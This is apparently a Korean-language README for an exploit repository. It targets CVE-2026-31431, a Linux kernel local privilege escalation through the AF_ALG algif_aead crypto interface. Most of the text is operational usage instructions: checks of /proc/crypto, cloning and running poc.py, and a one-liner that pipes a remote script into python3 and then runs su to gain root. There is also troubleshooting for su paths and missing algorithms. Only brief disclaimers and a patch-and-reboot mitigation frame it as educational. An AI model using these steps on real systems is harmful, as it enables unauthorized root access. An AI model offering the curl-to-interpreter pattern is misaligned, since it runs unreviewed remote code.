
# Linux 커널 로컬 권한 상승 PoC (CVE-2026-31431) AF_ALG algif_aead를 통한 Linux 커널 로컬 권한 상승을 시연하는 교육용 개념 증명(PoC)입니다. 방어적 연구를 위한 사용 지침과 완화 가이드를 포함합니다.
CVE-2026-31431(일명 Copy Fail)에 대한 교육용 Proof of Concept으로, AF_ALG / algif_aead 암호화 인터페이스와 관련된 Linux 커널 로컬 권한 상승 취약점입니다.
[!WARNING] 이 저장소는 교육, 방어 및 승인된 보안 연구 목적으로만 엄격히 제공됩니다.
소유하지 않은 시스템이나 명시적인 서면 허가 없이 테스트할 수 없는 시스템에서는 이 코드를 실행하지 마십시오.
승인되지 않은 사용은 불법일 수 있습니다.
CVE-2026-31431은 커널 암호화 하위 시스템에 영향을 미치는 Linux 커널 로컬 권한 상승 취약점입니다.
이 취약점은 AF_ALG 인터페이스를 통해 노출되는 AEAD 경로와 관련이 있으며, 로컬의 권한이 없는 사용자가 읽기 가능한 파일과 연결된 페이지 캐시 데이터를 간섭하여 취약한 시스템에서 권한 상승으로 이어질 수 있습니다.
이 저장소는 통제된 실험실 환경을 위한 최소한의 교육용 Proof of Concept을 포함합니다.
대상 시스템은 필요한 AF_ALG AEAD 알고리즘을 노출해야 합니다.
다음 명령으로 확인할 수 있습니다:
grep -i "authencesn\|authenc" /proc/crypto
PoC는 다음과 유사한 알고리즘에 대한 지원을 기대합니다:
authencesn(hmac(sha256),cbc(aes))
알고리즘을 사용할 수 없는 경우 PoC는 다음과 같은 오류와 함께 실패할 수 있습니다:
FileNotFoundError: [Errno 2] No such file or directory
이는 필요한 커널 암호화 알고리즘이 시스템에서 사용 가능하지 않음을 의미합니다.
저장소를 클론합니다:
git clone https://github.com/Karim33z/CVE-2026-31431.git
cd CVE-2026-31431
PoC를 실행합니다:
python3 poc.py
또는 직접 실행합니다:
curl -s https://raw.githubusercontent.com/Karim33z/CVE-2026-31431/refs/heads/main/poc.py | python3 && su
일부 Linux 시스템은 /usr/bin/su 대신 /bin/su를 사용합니다. 올바른 경로는 다음 명령으로 확인할 수 있습니다:
which su
필요한 경우 poc.py 내부의 대상 경로를 조정하십시오.
authencesn(hmac(sha256),cbc(aes))에 바인딩하는 동안 FileNotFoundError: [Errno 2] No such file or directory 오류가 발생하면 필요한 커널 알고리즘을 사용할 수 없는 것입니다.
사용 가능한 암호화 알고리즘을 확인합니다:
cat /proc/crypto
또는 더 구체적으로:
grep -i "authencesn\|authenc\|cbc(aes)\|sha256" /proc/crypto
PoC가 /usr/bin/su를 참조하지만 시스템이 /bin/su를 사용하는 경우 다음으로 확인합니다:
which su
그런 다음 poc.py의 경로를 그에 맞게 업데이트하십시오.
방어자는 배포판 공급업체가 제공하는 패치된 Linux 커널 버전으로 업데이트해야 합니다.
커널을 업데이트한 후 시스템을 재부팅하여 패치된 커널이 활성화되었는지 확인하십시오.
임시 완화 조치에는 환경 및 배포판에 따라 영향을 받는 커널 암호화 기능에 대한 액세스 제한이 포함될 수 있습니다.
이 프로젝트는 다음 목적으로만 제공됩니다:
저자는 이 코드로 인한 오용, 손해 또는 불법 활동에 대해 책임을 지지 않습니다.
명시적 승인이 있는 시스템에서만 사용하십시오.
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다.